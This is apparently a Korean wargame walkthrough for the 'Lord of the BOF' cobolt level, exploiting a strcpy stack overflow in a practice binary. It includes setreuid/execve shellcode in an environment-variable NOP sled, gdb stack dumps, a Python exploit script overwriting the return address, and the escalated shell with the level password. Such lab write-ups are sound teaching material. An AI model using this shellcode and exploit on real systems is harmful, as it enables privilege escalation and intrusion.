BOF 원정대 – Level 2 (cobolt)

Level 2 문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- cobolt
- small buffer
*/

int main(int argc, char *argv[])
{
 char buffer[16];
 if(argc < 2){
 printf(argv error\n);
 exit(0);
 }
 strcpy(buffer, argv[1]);
 printf(%s\n, buffer);
}

이번 문제는 전 문제와 달리 버퍼의 크기가 작다. 이런 경우 환경변수를 이용할 수 있다. 다만 RET 주소를 덮어쓸 때 \xff 를 입력을 못받으므로 \xff를 회피해야 하는게 이 문제의 핵심이다. 회피 방법은 이전 문제처럼 NOP를 다수 입력 하여 회피할 수 있을 것이다.

[gremlin@localhost gremlin]$ export SH=`python -c print '\x90'*100000 + '\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'` 
[gremlin@localhost gremlin]$ gdb cobolt_tmp 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048436
(gdb) r
Starting program: /home/gremlin/cobolt_tmp 

Breakpoint 1, 0x8048436 in main ()
(gdb) x/32wx $esp
0xbffe7478: 0xbffe7488 0x0804841b 0x080494ec 0x08049500
0xbffe7488: 0xbffe74a8 0x400309cb 0x00000001 0xbffe74d4
0xbffe7498: 0xbffe74dc 0x40013868 0x00000001 0x08048380
0xbffe74a8: 0x00000000 0x080483a1 0x08048430 0x00000001
0xbffe74b8: 0xbffe74d4 0x080482e0 0x080484ac 0x4000ae60
0xbffe74c8: 0xbffe74cc 0x40013e90 0x00000001 0xbffe75bb
0xbffe74d8: 0x00000000 0xbffe75d4 0xbffe75f6 0xbffe7600
0xbffe74e8: 0xbffe760e 0xbffe762d 0xbffe763d 0xbffe7656
(gdb) 
0xbffe74f8: 0xbffe7673 0xbffe767e 0xbffe768c 0xbffe76cf
0xbffe7508: 0xbffe76e2 0xbffe76f7 0xbffe7707 0xbffe7714
0xbffe7518: 0xbffe7733 0xbffe773e 0xbffffe0b 0xbffffe18
0xbffe7528: 0xbffffe20 0x00000000 0x00000003 0x08048034
0xbffe7538: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffe7548: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffe7558: 0x00000008 0x00000000 0x00000009 0x08048380
0xbffe7568: 0x0000000b 0x000001f5 0x0000000c 0x000001f5
(gdb) 
0xbffe7578: 0x0000000d 0x000001f5 0x0000000e 0x000001f5
0xbffe7588: 0x00000010 0x0febfbff 0x0000000f 0xbffe75b6
0xbffe7598: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe75a8: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffe75b8: 0x2f003638 0x656d6f68 0x6572672f 0x6e696c6d
0xbffe75c8: 0x626f632f 0x5f746c6f 0x00706d74 0x5353454c
0xbffe75d8: 0x4e45504f 0x752f7c3d 0x622f7273 0x6c2f6e69
0xbffe75e8: 0x70737365 0x2e657069 0x25206873 0x53550073
(gdb) 
0xbffe75f8: 0x414e5245 0x003d454d 0x54534948 0x455a4953
0xbffe7608: 0x3030313d 0x4f480030 0x414e5453 0x6c3d454d
0xbffe7618: 0x6c61636f 0x74736f68 0x636f6c2e 0x6f646c61
0xbffe7628: 0x6e69616d 0x474f4c00 0x454d414e 0x6572673d
0xbffe7638: 0x6e696c6d 0x4d455200 0x4845544f 0x3d54534f
0xbffe7648: 0x2e323931 0x2e383631 0x2e383132 0x414d0031
0xbffe7658: 0x2f3d4c49 0x2f726176 0x6f6f7073 0x616d2f6c
0xbffe7668: 0x672f6c69 0x6c6d6572 0x54006e69 0x3d4d5245
(gdb) 
0xbffe7678: 0x756e696c 0x4f480078 0x59545453 0x693d4550
0xbffe7688: 0x00363833 0x48544150 0x73752f3d 0x6f6c2f72
0xbffe7698: 0x2f6c6163 0x3a6e6962 0x6e69622f 0x73752f3a
0xbffe76a8: 0x69622f72 0x752f3a6e 0x582f7273 0x36523131
0xbffe76b8: 0x6e69622f 0x6f682f3a 0x672f656d 0x6c6d6572
0xbffe76c8: 0x622f6e69 0x48006e69 0x3d454d4f 0x6d6f682f
0xbffe76d8: 0x72672f65 0x696c6d65 0x4e49006e 0x52545550
0xbffe76e8: 0x652f3d43 0x692f6374 0x7475706e 0x53006372
(gdb) 
0xbffe76f8: 0x4c4c4548 0x69622f3d 0x61622f6e 0x55006873
0xbffe7708: 0x3d524553 0x6d657267 0x006e696c 0x48534142
0xbffe7718: 0x564e455f 0x6f682f3d 0x672f656d 0x6c6d6572
0xbffe7728: 0x2e2f6e69 0x68736162 0x4c006372 0x3d474e41
0xbffe7738: 0x555f6e65 0x48530053 0x9090903d 0x90909090
0xbffe7748: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7758: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7768: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) 
0xbffe7778: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7788: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe7798: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffe77e8: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)

이와 같이 환경변수에 NOP를 다수 다수 입력하게 되면 \xff 주소를 회피 할 수 있다. 이제 공격코드를 작성해 보도록 하자.

#!/usr/bin/python
import os
from struct import pack

def main():
 payload = 'A'*20 + pack('<L', 0xbffe7778)
 os.execl('/home/gremlin/cobolt', 'cobolt', payload)

if __name__ == '__main__':
 print '[+] Strat'
 main()
 print '[+] End'

[gremlin@localhost gremlin]$ ./ex.py 
[+] Strat
AAAAAAAAAAAAAAAAAAAAxwbash$ id
uid=502(cobolt) gid=501(gremlin) egid=502(cobolt) groups=501(gremlin)
bash$ my-pass
euid = 502
hacking exposed
bash$